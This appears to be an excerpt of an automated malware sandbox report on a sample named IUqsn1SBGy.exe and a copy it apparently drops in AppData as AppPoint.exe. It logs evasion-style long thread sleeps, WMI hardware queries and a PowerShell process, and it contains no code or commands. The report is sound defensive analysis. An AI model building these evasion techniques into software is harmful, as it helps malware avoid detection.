Source: C:\Users\user\Desktop\IUqsn1SBGy.exe TID: 760	Thread sleep time: -33204139332677172s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\IUqsn1SBGy.exe TID: 760	Thread sleep time: -600000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\IUqsn1SBGy.exe TID: 760	Thread sleep time: -599890s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\IUqsn1SBGy.exe TID: 760	Thread sleep time: -599781s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\IUqsn1SBGy.exe TID: 760	Thread sleep time: -599672s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\IUqsn1SBGy.exe TID: 760	Thread sleep time: -599562s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\IUqsn1SBGy.exe TID: 760	Thread sleep time: -599453s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\IUqsn1SBGy.exe TID: 760	Thread sleep time: -599344s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\IUqsn1SBGy.exe TID: 760	Thread sleep time: -599226s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\IUqsn1SBGy.exe TID: 760	Thread sleep time: -599124s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\IUqsn1SBGy.exe TID: 760	Thread sleep time: -599016s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\IUqsn1SBGy.exe TID: 760	Thread sleep time: -598906s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\IUqsn1SBGy.exe TID: 760	Thread sleep time: -598797s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\IUqsn1SBGy.exe TID: 760	Thread sleep time: -598687s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\IUqsn1SBGy.exe TID: 760	Thread sleep time: -598578s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\IUqsn1SBGy.exe TID: 760	Thread sleep time: -598469s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\IUqsn1SBGy.exe TID: 760	Thread sleep time: -598359s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\IUqsn1SBGy.exe TID: 760	Thread sleep time: -598247s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\IUqsn1SBGy.exe TID: 760	Thread sleep time: -598141s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\IUqsn1SBGy.exe TID: 760	Thread sleep time: -598031s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\IUqsn1SBGy.exe TID: 760	Thread sleep time: -597922s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\IUqsn1SBGy.exe TID: 760	Thread sleep time: -597812s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\IUqsn1SBGy.exe TID: 760	Thread sleep time: -597703s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\IUqsn1SBGy.exe TID: 760	Thread sleep time: -597592s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\IUqsn1SBGy.exe TID: 760	Thread sleep time: -597484s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\IUqsn1SBGy.exe TID: 760	Thread sleep time: -597375s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\IUqsn1SBGy.exe TID: 760	Thread sleep time: -597263s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\IUqsn1SBGy.exe TID: 760	Thread sleep time: -597153s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\IUqsn1SBGy.exe TID: 760	Thread sleep time: -597038s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\IUqsn1SBGy.exe TID: 760	Thread sleep time: -596936s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\IUqsn1SBGy.exe TID: 760	Thread sleep time: -596818s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\IUqsn1SBGy.exe TID: 760	Thread sleep time: -596668s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\IUqsn1SBGy.exe TID: 760	Thread sleep time: -596552s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\IUqsn1SBGy.exe TID: 760	Thread sleep time: -596437s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\IUqsn1SBGy.exe TID: 760	Thread sleep time: -596328s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\IUqsn1SBGy.exe TID: 760	Thread sleep time: -596217s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\IUqsn1SBGy.exe TID: 760	Thread sleep time: -596109s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\IUqsn1SBGy.exe TID: 760	Thread sleep time: -596000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\IUqsn1SBGy.exe TID: 760	Thread sleep time: -595890s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\IUqsn1SBGy.exe TID: 760	Thread sleep time: -595781s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\IUqsn1SBGy.exe TID: 760	Thread sleep time: -595672s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\IUqsn1SBGy.exe TID: 760	Thread sleep time: -595562s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\IUqsn1SBGy.exe TID: 760	Thread sleep time: -595453s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\IUqsn1SBGy.exe TID: 760	Thread sleep time: -595342s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\IUqsn1SBGy.exe TID: 760	Thread sleep time: -595234s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\IUqsn1SBGy.exe TID: 760	Thread sleep time: -595125s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\IUqsn1SBGy.exe TID: 760	Thread sleep time: -595016s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\IUqsn1SBGy.exe TID: 760	Thread sleep time: -594891s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\IUqsn1SBGy.exe TID: 760	Thread sleep time: -594781s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\IUqsn1SBGy.exe TID: 760	Thread sleep time: -594672s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\IUqsn1SBGy.exe TID: 760	Thread sleep time: -594562s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe TID: 7420	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe TID: 7620	Thread sleep count: 35 > 30	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe TID: 7620	Thread sleep time: -32281802128991695s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe TID: 7620	Thread sleep time: -600000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe TID: 7624	Thread sleep count: 3686 > 30	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe TID: 7620	Thread sleep time: -599888s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe TID: 7624	Thread sleep count: 6154 > 30	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe TID: 7620	Thread sleep time: -599766s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe TID: 7620	Thread sleep time: -599643s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe TID: 7620	Thread sleep time: -599527s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe TID: 7620	Thread sleep time: -599144s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe TID: 7620	Thread sleep time: -599016s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe TID: 7620	Thread sleep time: -598891s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe TID: 7620	Thread sleep time: -598781s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe TID: 7620	Thread sleep time: -598672s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe TID: 7620	Thread sleep time: -598562s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe TID: 7620	Thread sleep time: -598453s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe TID: 7620	Thread sleep time: -598344s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe TID: 7620	Thread sleep time: -598225s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe TID: 7620	Thread sleep time: -598109s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe TID: 7620	Thread sleep time: -598000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe TID: 7620	Thread sleep time: -597890s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe TID: 7620	Thread sleep time: -597781s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe TID: 7620	Thread sleep time: -597672s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe TID: 7620	Thread sleep time: -597562s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe TID: 7620	Thread sleep time: -597453s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe TID: 7620	Thread sleep time: -597344s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe TID: 7620	Thread sleep time: -597234s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe TID: 7620	Thread sleep time: -597125s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe TID: 7620	Thread sleep time: -597016s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe TID: 7620	Thread sleep time: -596905s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe TID: 7620	Thread sleep time: -596781s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe TID: 7620	Thread sleep time: -596669s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe TID: 7620	Thread sleep time: -596561s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe TID: 7620	Thread sleep time: -596426s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe TID: 7620	Thread sleep time: -596297s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe TID: 7620	Thread sleep time: -596187s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe TID: 7620	Thread sleep time: -596078s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe TID: 7620	Thread sleep time: -595969s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe TID: 7620	Thread sleep time: -595859s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe TID: 7620	Thread sleep time: -595750s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe TID: 7620	Thread sleep time: -595641s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe TID: 7620	Thread sleep time: -595516s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe TID: 7620	Thread sleep time: -595391s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe TID: 7620	Thread sleep time: -595281s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe TID: 7620	Thread sleep time: -595172s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe TID: 7620	Thread sleep time: -595063s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe TID: 7620	Thread sleep time: -594938s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe TID: 7620	Thread sleep time: -594826s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe TID: 7620	Thread sleep time: -594708s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe TID: 7620	Thread sleep time: -594593s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe TID: 7620	Thread sleep time: -594480s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe TID: 7620	Thread sleep time: -594371s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe TID: 7620	Thread sleep time: -594235s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe TID: 7620	Thread sleep time: -594124s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe TID: 7620	Thread sleep time: -594000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe TID: 7688	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe TID: 7832	Thread sleep time: -31359464925306218s >= -30000s
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe TID: 7832	Thread sleep time: -600000s >= -30000s
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe TID: 7832	Thread sleep time: -599890s >= -30000s
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe TID: 7832	Thread sleep time: -599781s >= -30000s
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe TID: 7832	Thread sleep time: -599671s >= -30000s
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe TID: 7832	Thread sleep time: -599562s >= -30000s
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe TID: 7832	Thread sleep time: -599453s >= -30000s
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe TID: 7832	Thread sleep time: -599343s >= -30000s
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe TID: 7832	Thread sleep time: -599234s >= -30000s
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe TID: 7832	Thread sleep time: -599122s >= -30000s
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe TID: 7832	Thread sleep time: -599015s >= -30000s
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe TID: 7832	Thread sleep time: -598905s >= -30000s
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe TID: 7832	Thread sleep time: -598796s >= -30000s
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe TID: 7832	Thread sleep time: -598687s >= -30000s
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe TID: 7832	Thread sleep time: -598578s >= -30000s
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe TID: 7832	Thread sleep time: -598468s >= -30000s
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe TID: 7832	Thread sleep time: -598359s >= -30000s
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe TID: 7832	Thread sleep time: -598250s >= -30000s
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe TID: 7832	Thread sleep time: -598140s >= -30000s
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe TID: 7832	Thread sleep time: -598030s >= -30000s
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe TID: 7832	Thread sleep time: -597921s >= -30000s
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe TID: 7832	Thread sleep time: -597812s >= -30000s
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe TID: 7832	Thread sleep time: -597703s >= -30000s
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe TID: 7832	Thread sleep time: -597593s >= -30000s
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe TID: 7832	Thread sleep time: -597484s >= -30000s
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe TID: 7832	Thread sleep time: -597374s >= -30000s
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe TID: 7832	Thread sleep time: -597265s >= -30000s
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe TID: 7832	Thread sleep time: -597156s >= -30000s
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe TID: 7832	Thread sleep time: -597046s >= -30000s
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe TID: 7832	Thread sleep time: -596937s >= -30000s
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe TID: 7832	Thread sleep time: -596828s >= -30000s
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe TID: 7832	Thread sleep time: -596718s >= -30000s
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe TID: 7832	Thread sleep time: -596609s >= -30000s
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe TID: 7832	Thread sleep time: -596500s >= -30000s
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe TID: 7832	Thread sleep time: -596390s >= -30000s
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe TID: 7832	Thread sleep time: -596281s >= -30000s
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe TID: 7832	Thread sleep time: -596171s >= -30000s
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe TID: 7832	Thread sleep time: -596062s >= -30000s
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe TID: 7832	Thread sleep time: -595952s >= -30000s
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe TID: 7832	Thread sleep time: -595843s >= -30000s
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe TID: 7832	Thread sleep time: -595734s >= -30000s
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe TID: 7832	Thread sleep time: -595624s >= -30000s
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe TID: 7832	Thread sleep time: -595515s >= -30000s
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe TID: 7832	Thread sleep time: -595406s >= -30000s
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe TID: 7832	Thread sleep time: -595296s >= -30000s
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe TID: 7832	Thread sleep time: -595186s >= -30000s
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe TID: 7832	Thread sleep time: -595078s >= -30000s
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe TID: 7832	Thread sleep time: -594968s >= -30000s
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe TID: 7832	Thread sleep time: -594859s >= -30000s
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe TID: 7832	Thread sleep time: -594749s >= -30000s
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe TID: 7832	Thread sleep time: -594640s >= -30000s

Source: C:\Users\user\Desktop\IUqsn1SBGy.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard

Source: C:\Users\user\Desktop\IUqsn1SBGy.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\Desktop\IUqsn1SBGy.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\IUqsn1SBGy.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\IUqsn1SBGy.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\IUqsn1SBGy.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\IUqsn1SBGy.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\IUqsn1SBGy.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\IUqsn1SBGy.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\IUqsn1SBGy.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\IUqsn1SBGy.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\IUqsn1SBGy.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Users\user\Desktop\IUqsn1SBGy.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\IUqsn1SBGy.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\IUqsn1SBGy.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\Desktop\IUqsn1SBGy.exe	Thread delayed: delay time: 599890	Jump to behavior
Source: C:\Users\user\Desktop\IUqsn1SBGy.exe	Thread delayed: delay time: 599781	Jump to behavior
Source: C:\Users\user\Desktop\IUqsn1SBGy.exe	Thread delayed: delay time: 599672	Jump to behavior
Source: C:\Users\user\Desktop\IUqsn1SBGy.exe	Thread delayed: delay time: 599562	Jump to behavior
Source: C:\Users\user\Desktop\IUqsn1SBGy.exe	Thread delayed: delay time: 599453	Jump to behavior
Source: C:\Users\user\Desktop\IUqsn1SBGy.exe	Thread delayed: delay time: 599344	Jump to behavior
Source: C:\Users\user\Desktop\IUqsn1SBGy.exe	Thread delayed: delay time: 599226	Jump to behavior
Source: C:\Users\user\Desktop\IUqsn1SBGy.exe	Thread delayed: delay time: 599124	Jump to behavior
Source: C:\Users\user\Desktop\IUqsn1SBGy.exe	Thread delayed: delay time: 599016	Jump to behavior
Source: C:\Users\user\Desktop\IUqsn1SBGy.exe	Thread delayed: delay time: 598906	Jump to behavior
Source: C:\Users\user\Desktop\IUqsn1SBGy.exe	Thread delayed: delay time: 598797	Jump to behavior
Source: C:\Users\user\Desktop\IUqsn1SBGy.exe	Thread delayed: delay time: 598687	Jump to behavior
Source: C:\Users\user\Desktop\IUqsn1SBGy.exe	Thread delayed: delay time: 598578	Jump to behavior
Source: C:\Users\user\Desktop\IUqsn1SBGy.exe	Thread delayed: delay time: 598469	Jump to behavior
Source: C:\Users\user\Desktop\IUqsn1SBGy.exe	Thread delayed: delay time: 598359	Jump to behavior
Source: C:\Users\user\Desktop\IUqsn1SBGy.exe	Thread delayed: delay time: 598247	Jump to behavior
Source: C:\Users\user\Desktop\IUqsn1SBGy.exe	Thread delayed: delay time: 598141	Jump to behavior
Source: C:\Users\user\Desktop\IUqsn1SBGy.exe	Thread delayed: delay time: 598031	Jump to behavior
Source: C:\Users\user\Desktop\IUqsn1SBGy.exe	Thread delayed: delay time: 597922	Jump to behavior
Source: C:\Users\user\Desktop\IUqsn1SBGy.exe	Thread delayed: delay time: 597812	Jump to behavior
Source: C:\Users\user\Desktop\IUqsn1SBGy.exe	Thread delayed: delay time: 597703	Jump to behavior
Source: C:\Users\user\Desktop\IUqsn1SBGy.exe	Thread delayed: delay time: 597592	Jump to behavior
Source: C:\Users\user\Desktop\IUqsn1SBGy.exe	Thread delayed: delay time: 597484	Jump to behavior
Source: C:\Users\user\Desktop\IUqsn1SBGy.exe	Thread delayed: delay time: 597375	Jump to behavior
Source: C:\Users\user\Desktop\IUqsn1SBGy.exe	Thread delayed: delay time: 597263	Jump to behavior
Source: C:\Users\user\Desktop\IUqsn1SBGy.exe	Thread delayed: delay time: 597153	Jump to behavior
Source: C:\Users\user\Desktop\IUqsn1SBGy.exe	Thread delayed: delay time: 597038	Jump to behavior
Source: C:\Users\user\Desktop\IUqsn1SBGy.exe	Thread delayed: delay time: 596936	Jump to behavior
Source: C:\Users\user\Desktop\IUqsn1SBGy.exe	Thread delayed: delay time: 596818	Jump to behavior
Source: C:\Users\user\Desktop\IUqsn1SBGy.exe	Thread delayed: delay time: 596668	Jump to behavior
Source: C:\Users\user\Desktop\IUqsn1SBGy.exe	Thread delayed: delay time: 596552	Jump to behavior
Source: C:\Users\user\Desktop\IUqsn1SBGy.exe	Thread delayed: delay time: 596437	Jump to behavior
Source: C:\Users\user\Desktop\IUqsn1SBGy.exe	Thread delayed: delay time: 596328	Jump to behavior
Source: C:\Users\user\Desktop\IUqsn1SBGy.exe	Thread delayed: delay time: 596217	Jump to behavior
Source: C:\Users\user\Desktop\IUqsn1SBGy.exe	Thread delayed: delay time: 596109	Jump to behavior
